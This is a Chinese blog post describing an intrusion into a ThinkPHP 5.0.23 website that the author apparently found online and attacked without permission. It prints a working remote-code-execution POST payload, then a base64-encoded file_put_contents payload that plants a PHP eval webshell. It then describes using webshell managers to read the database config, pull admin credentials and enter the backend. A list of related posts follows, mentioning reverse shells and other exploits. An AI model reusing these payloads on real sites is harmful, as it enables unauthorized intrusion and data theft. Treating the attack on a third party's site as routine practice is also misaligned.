记一次渗透实战

最新推荐文章于 2025-10-16 16:43:10 发布
原创 最新推荐文章于 2025-10-16 16:43:10 发布 · 1.1k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#乌鸦安全 #网络安全

 微信公众号:乌鸦安全

 

扫取二维码获取更多信息!

更新时间:2021.05.14

01   前提

在早些时候看到先知上有一篇关于thinkphp  rce的实战文章

https://xz.aliyun.com/t/6267

于是顺着师傅的思路也来试试

从网上顺利找到的某一个相似的站点,然后就按照师傅的思路来了

02 geshell之路

通过报错的方式发现了当前的版本为

ThinkPHPV5.0.23

通过师傅的思路,先去找phpinfo界面

http://127.0.0.1/index.php?s=captcha

POST数据:

_method=__construct&filter[]=assert&method=get&server[REQUEST_METHOD]=phpinfo()

成功拿到phpinfo界面

查看下这里禁用了贼多的命令

那尝试写一下一句话木马吧,按照师傅写的参考里面使用了很多次都没有效果,此时一度陷入僵局。

后来经过不断的fuzz发现,这里获取phpinfo界面的方式还有post的,后端可以同时接收getpost的数据。

知道这个之后,按照师傅文章的提示进行如下的数据构造:

_method=__construct&filter[]=assert&method=post&server[REQUEST_METHOD]=file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MTI8P3BocCBldmFsKEAkX1BPU1RbJ2EnXSk7))

将一句话木马进行加密

命令执行成功,get到shell

03 进后台

在路径:

/www/wwwroot/xxxxx/application/

发现数据库配置文件

蚁剑连接数据库失败:

使用哥斯拉连接数据库成功

查询到后台的账号和密码,在后台中翻到了后台地址(啊,这还不如直接猜。。。。)

登陆后台成功

04 总结

这次主要是踩在师傅宽大的肩膀上成功getshell的,但是还没能进行提权,命令直接被禁用,等下次有时间的时候再搞吧,溜了溜了

 微信公众号:乌鸦安全

 

扫取二维码获取更多信息!

网络安全一次简单渗透测试实战
kali_Ma的博客
09-23 3349
整个渗透过程(尤其是提权过程)都异常的顺利,虽然通过辅助平台查询后发现有多个漏洞可以利用,但没想到msf的getsystem直接就拿下了最高权限。
一次想尽各种方法的渗透测试实战
03-10 1679
前言 本文总结一下漫长的渗透测试过程,想尽了各种方法,终于找到了突破口。 so没有绝对的安全,所谓的安全性其实都是相对的~ 信息踩点 在这里其实没办法去做一些有价值的收集,只能踩点,踩坑。 信息难点 传输加密: 要做渗透的目标是一个APP,根据抓到的请求包发现这个APP是经过某产品加固过的,所以HTTP的POST请求正文部分(Data)是神奇的密文~ 分析难点 分析: 信息踩点其实也是解决难点的过程,在这里我们尝试对APP进行逆向,发现并没有什么东西,因为被加固了。...
一次渗透测试实战
热门推荐
m0_46467017的博客
04-23 3万+
一次渗透测试实战前言信息收集漏洞验证漏洞攻击Grafana任意文件读取漏洞(CVE-2021-43798)一、漏洞描述二、漏洞影响范围Payload:ActiveMQ 任意文件上传漏洞(CVE-2016-3088)一、漏洞描述二、漏洞影响范围三、漏洞利用:写入webshell权限提升CVE-2021-4034 Linux polkit 提权漏洞一、漏洞描述二、影响版本三、漏洞利用总结 前言 学习了一两个月的安全,为了对自己的一个学习水平做一个总结,所以我特地找来一个网站来进行一次渗透实战。 信息收集 这次的
渗透测试实战教程!一次从0到1的逻辑漏洞挖掘全流程
最新发布
qq_41314882的博客
10-16 871
摘要: 本文分享了一次从零开始的渗透测试经历。面对一个登录后前端空白、仅有两个接口的系统,作者通过分析JS文件发现大量接口,但大多返回403。经过不懈努力,找到一个报错提示缺少"tenantId"参数的接口,最终通过其他接口获取该参数值,成功调通接口并获取573万用户敏感信息。整个过程充满挫折,但坚持探索最终取得成果,体现了网络安全工作中"逆天而行"的精神。文章详细还原了漏洞挖掘的每个关键步骤和应对策略,为安全研究人员提供了宝贵经验。
一次渗透测试实战
zhangge3663的博客
11-02 1521
0X01 突破边界拿下shell 周末在家闲着没事突然就想搞事情了,然后使用Google hack语法输入inurl:xxx.xxx.xxx/upload批量搜索可能存在上传点的网站,试了好几个最后找到一个可利用的上传点。 注:涉及敏感信息,图片仅供参考,具体内容自行填充。 0X02 反弹shell&提权 Linux下需要把shell反弹出来以方便我们操作,但是目标主机上既没有nc也没有python,查询相关资料后尝试了一下利用bash弹shell。需要一台公网服务器,使用命令ba.
一次渗透测试
Hungchuiho的博客
05-30 2159
一、前言:因为最近学习的有点膨胀感觉自己应该可以对一些简单的网站拿下服务器。这也是为什么有我这篇文章的出现的原因。 二、网站测试过程: 1、网站的选择: 对于测试的网站的我是使用googlehack语法来搜索的,对于如何使用Googlehack语法我就不说了,网上有使用教程,运气很好不用多久我找到了一个可以对其进行测试的网站。 2、网站进行信息收集: Whois信息–注册人、电话、邮箱、DNS、...
一次渗透实战案例思路分享
weixin_54787877的博客
03-22 1317
注 文章来源:“潇湘信安”公众号 0x01 前言 前几天帮朋友搞了一个域,很久没有搞域了感觉都快忘的差不多了,不过还好最终还是打穿了这个域,不过应朋友要求就不以文章形式来写了,简单的整理了下思路和测试过程中遇到的一些问题和解决方法分享给大家,希望大家能够从中有所收获!!! 0x02 域渗透思路总结 1.利用Jenkins来进行打点Getshell,默认SYSTEM权限,但是当前主机不能出网,工作组50.1; 2.通过nettat -ano网络连接分析发现这台机器有与其他公网连接,21、443等..
【内网渗透一次靶机实战
kali_Ma的博客
11-24 1835
靶机难度属于中等靶机水平,全文思路就是信息收集,使用nmap或者masscan进行端口扫描,访问web页面,发现提示,接着使用wfuzz进行指定路径fuzz。然后找到py脚本,接着进行脚本分析,发现脚本存在的漏洞。构造poc然后进行反弹shell,反弹shell之后,发现存在另一个新的脚本,存在密码加密方式和密码本。进行解密,解密之后使用ssh进行远程登录。使用sudo -l发现xx路径下的python脚本拥有root权限,接着进行移动该目录写入提权语法成功提权。
实战|一次 hw 行动中的渗透测试
无问社区的博客
07-07 1039
本文总结一下今年某次 hw 渗透测试过程,虽然现在的教育机构越来越重视安全,但没有绝对的安全,所谓的安全性其实都是相对的。
php网站渗透实战_【案例分析】一次综合靶场实战渗透
weixin_39981360的博客
12-19 990
原标题:【案例分析】一次综合靶场实战渗透时间有点久,这里主要和大家分享一下思路。该靶场是多层网络下的综合渗透,只开放了一个web端可以访问,其他均处于内网。开始渗透首先进入靶场开放的唯一一个开放的web端。进入网站首页,发现是Mallbuilder,并且该版本有注入漏洞,可以直接获取管理员密码。payload:/cate_show_ajax.php?oper=ajax& call=get...
实战渗透-一次文件上传拿到aspx站点(1)
qq_29437513的博客
09-01 723
这两天实在有些忙,,前段时间拿到的某个SHELL,今天打算放放,接着挖信息泄露 站点大概是这样的,, http://ABC.xxxx.xxx.cn/HxxQxx/login 登录地址 登录后台后,拿到后台管理权限 找到两个上传点 1.植物处的一处文件上传 2.新闻管理的一处上传 ,在第一处上传附件是保存为图片,,burp抓包看到解析的内容有些多,抓包改包结果没成功 ,第二处上传附件从站点首页看到有docx,excel等类型,,这个地方大概率能传马 抓包的时候有safedog-flow-item字段,,传
一次渗透实战【转】
时光凉春衫薄的博客
07-10 5789
一次渗透实战【转】 信息收集 用dirsearch扫了一波目录没有发现什么东西 直接用主站域名解析的ip访问发现主站是挂有cdn的 subDomainsBrute 扫描子域名 其中一个子域没挂CDN,由此找到网站的真实ip 得到真实ip后nmap扫描发现8099端口有个未知应用 访问发现是个WEB服务,一个登陆界面漏洞利用 趁nmap还在工作的时候,简单浏览了下网站的功能,伪静态,整个网站也没...
微信公众号开发之内网渗透
youhebuke225的博客
05-30 1679
本地服务器 我们先使用express框架写一个简单的服务器 初始化项目 npm init 下载express框架 npm install express -S 写一个简单的服务器 const express = require("express"); const app = express(); app.use((req, res, next) => { console.log(req.query); res.send("Hello World!"); }); app.li
网络安全之信息收集
jazzz98的博客
05-26 1785
​ 在信息收集这块区域,我将其分为两部分:第一部分即被动信息收集,第二部分即主动信息收集。
微信公众号开发本地调试【内网穿透】
内网渗透的博客
08-08 344
在做微信公众号开发的时候,必须接入外网已经备案的URL地址,不然本地没法进行调试,比较简单的方法可以做内网穿透,映射生成一个外网URL地址来进行回调测试。这里推荐一个内网穿透工具——cpolar,可以免费使用,支持http/https/tcp协议,不限制流量。
微信公众号开发内网渗透常用工具+超详细操作步骤
weixin_33982670的博客
01-20 883
前段时间接触到微信公众号开发,需要做外网映射,就是需要把本地服务 映射到外网,微信web开发工具才能访问到部署到tomcat的应用。 so, 本狗蛋到网上一搜,发现 外网映射的工具还是挺多的,有了这些工具,恰好平时自己又开发有一些作品,但又没有部署到外网,这时候就可以启动本地tomcat 服务,然后用工具映射到外网,在朋友面前装逼一把。如果,电脑硬盘有各位老师羞答答视频,就可以做一小视频网站,...
安全测试--WEB,微信端渗透测试报告
Qton_优快云的博客
02-27 4315
测试流程: 1.先用wvs扫 2.暴力破解 3.稍微看下请求包有什么不妥的地方没有,比如明文传输,cookie放太多个人信息,等等 4.一边看wvs结果可以一边找sql注入点,比如查询的地方 5.一边看wvs一边看xss的注入点,比如存储数据的地方 6.找文件上传的地方,尝试绕过,传马 7.有短信/邮箱服务的试一下炸弹 8.扫一下开启的端口,看看有没有开启不安全的服务等等 。。。差不多这样吧 都...
探析315晚会窃取手机号、微信号案例技术手法
ZL_1618的博客
03-24 2510
想象你在刷短视频时评论“这个课程怎么报名?”,刚发送出去,后台的“数字渔夫”立即撒网——预设的“报名”“咨询”等关键词触发警报,爬虫程序像章鱼触手般从各个平台(抖音评论、淘宝问答、虎牙弹幕)同时启动。云企智能的 “获客软件” 通过关键词(如 “双眼皮”“种植牙”“装修报价”)扫描短视频评论区、直播间弹幕,自动抓取用户手机号、微信账号。例如,用户在某医美直播间提问 “隆鼻价格”,软件立即锁定该评论并盗取联系方式,同步标注 “医美意向客户”。绿信科技更直接嵌入电商平台,窃取商品咨询用户的聊天录。
【攻防技术】信息收集之公众号自动收集
刘家华(游戏开发)
05-27 827
公众号自动收集的小脚本
一次C/S架构客户端渗透测试实践
资源摘要信息:"本文标题为《倔强的web狗一次CS架构渗透测试1》,描述中提到使用微软的Procexp工具在TCP/IP属性中查看程序发起的网络连接,结合标签“渗透测试、C/S架构、Web安全、数据包分析、流量抓取、HTTP请求...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值